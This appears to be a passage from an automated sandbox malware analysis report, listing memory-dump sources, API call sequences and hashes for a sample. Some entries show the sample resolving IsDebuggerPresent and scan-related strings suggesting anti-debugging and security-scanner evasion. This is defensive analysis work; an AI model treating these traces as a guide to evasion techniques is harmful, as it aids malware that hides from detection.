                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: HandleModule$AddressProc
                          • String ID: AeldnaHeludoMteG$KernelBASE
                          • API String ID: 1883125708-1952140341
                          • Opcode ID: b7443c4ef544cacd868449d880d3ecc8a67ab2b2fa4bdcd95122d33efd72319e
                          • Instruction ID: a599b593a3718ec0285e2559cfe5608e5b5ccb2d50b7e1175ffcdfe2f3a0f5c5
                          • Opcode Fuzzy Hash: b7443c4ef544cacd868449d880d3ecc8a67ab2b2fa4bdcd95122d33efd72319e
                          • Instruction Fuzzy Hash: B6F04971650304BFEF00EBA8D802A5E77AAEB4A740BA189F0F50897A10DA30AD10CA64
                          APIs
                          • GetModuleHandleW.KERNEL32(KernelBase,?,02B9EF98,UacInitialize,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize), ref: 02B9EB9A
                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B9EBAC
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: IsDebuggerPresent$KernelBase
                          • API String ID: 1646373207-2367923768
                          • Opcode ID: 0599b24204b04d17eac865f3a8fdaed0129b57bbc49a27c04d8a9b5b8ff2e440
                          • Instruction ID: c53f71deb4cd9cdc3d453f49dbe707813cf432df9d6911bbdf4a33748a3ba3b4
                          • Opcode Fuzzy Hash: 0599b24204b04d17eac865f3a8fdaed0129b57bbc49a27c04d8a9b5b8ff2e440
                          • Instruction Fuzzy Hash: F5D012B27557901EBE00BAF80CC4C5E03CD8B0562AB240EF2F02BD60E2E6AAC8529520
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,02BAC10B,00000000,02BAC11E), ref: 02B8C402
                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B8C413
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                          • API String ID: 1646373207-3712701948
                          • Opcode ID: 5446c4d82e08ba693b0dcbd544fc2e586c82b71f2d6aaa1f3283db5bab93140d
                          • Instruction ID: 30d5f4e4c7826c761ad5e143cbaae48e58a9f8eca252cb83d477fd94b7e396ef
                          • Opcode Fuzzy Hash: 5446c4d82e08ba693b0dcbd544fc2e586c82b71f2d6aaa1f3283db5bab93140d
                          • Instruction Fuzzy Hash: B1D05EE0A413434EE3047AB16882A323B888704748F4C68E6A01D46102C7718490CFA4
                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B8E21F
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B8E23B
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B8E2B2
                          • VariantClear.OLEAUT32(?), ref: 02B8E2DB
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: ArraySafe$Bound$ClearIndexVariant
                          • String ID:
                          • API String ID: 920484758-0
                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                          • Instruction ID: e164d1e99a325540b15e50a628cddb64a20d26c671c6ee6d7e0287f7c442ac9d
                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                          • Instruction Fuzzy Hash: 2C41E775A0062A9BCB61EF68CC90BD9B3BDAF49614F4042D6E64CA7251DA30EF80CF51
                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                          • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID:
                          • API String ID: 3990497365-0
                          • Opcode ID: f3a5b4e281a5385a5d422858d575297f5170b854b631361198c346ce602277d7
                          • Instruction ID: 020d07a2367a52c669e6449164ada2ba124696ac4a3ed9fb31f1c5f40dee9df3
                          • Opcode Fuzzy Hash: f3a5b4e281a5385a5d422858d575297f5170b854b631361198c346ce602277d7
                          • Instruction Fuzzy Hash: DA411A71A402589BDB61EB68CC84BDAB7FDAB18301F4444E6A64CE7251EB749F84CF50
                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                          • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID:
                          • API String ID: 3990497365-0
                          • Opcode ID: a90c939674047f4835d28c0887c519078ad7e3ceabcd1f77cb4434a912a6d82c
                          • Instruction ID: c11526136f2661489bc28ee0db205843ce0011f901268799c4cfeae0d4b59900
                          • Opcode Fuzzy Hash: a90c939674047f4835d28c0887c519078ad7e3ceabcd1f77cb4434a912a6d82c
                          • Instruction Fuzzy Hash: 2B413C71A402589BDB61FB68CC84BDAB7FDAB18301F4444E6A64CE7251EB749F84CF50
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca61b3061c19b8e66e8fc742f8e1e044f7b2720c6770b6cc8dbd9f2fbdd5cff1
                          • Instruction ID: e7e8d43b6d87b14230742a0b747fface9432644492f52e218fd486c63ae28868
                          • Opcode Fuzzy Hash: ca61b3061c19b8e66e8fc742f8e1e044f7b2720c6770b6cc8dbd9f2fbdd5cff1
                          • Instruction Fuzzy Hash: 76A1A4A67326014BE718BA7C9D943ADB3C6DB84265F1C42BEE21DCB281EB64C953C750
                          APIs
                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B894FA
                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B89500
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: DateFormatLocaleThread
                          • String ID: yyyy
                          • API String ID: 3303714858-3145165042
                          • Opcode ID: b6830b3e9d6891c1606c0558841f1da4350204044e4de2f21f2db8019276d9fa
                          • Instruction ID: 7a0757d37afb60cab30fe9307f88379dbdff6631a451916c2a4dc3c31c37de7b
                          • Opcode Fuzzy Hash: b6830b3e9d6891c1606c0558841f1da4350204044e4de2f21f2db8019276d9fa
                          • Instruction Fuzzy Hash: 9F216875A006189FDF21EBA8C881AFEB3F9EF48710F4500E5E909E7341D6309E04CBA5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AllocValue
                          • String ID: @m
                          • API String ID: 1189806713-3165096455
                          • Opcode ID: 488dc9f0e3bf28e9b7cdfe9650ffc9f4a80cabc78fcd8c6b3b390eded8e093ab
                          • Instruction ID: 454da917e5ea90792aad4ba5576225e421425af39b2a1246edd7f7ac5161304d
                          • Opcode Fuzzy Hash: 488dc9f0e3bf28e9b7cdfe9650ffc9f4a80cabc78fcd8c6b3b390eded8e093ab
                          • Instruction Fuzzy Hash: 51C04CB1E403128AFF05BBB9D40570D379EEB00385F089DA5B418CB549EB75D451DF55
                          APIs
                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AD98
                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B9ADC8
                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B9ADE7
                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9ADF3
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Read$Write
                          • String ID:
                          • API String ID: 3448952669-0
                          • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                          • Instruction ID: 97d01d2c2ef992594f9a9b27b11ef196e9b375d8277034a169d8aa97b584b2c6
                          • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                          • Instruction Fuzzy Hash: E92184B1A40219DBDF10DF69CC80BAE77B9EF44352F1042A1EE5497344EB34D911DAA0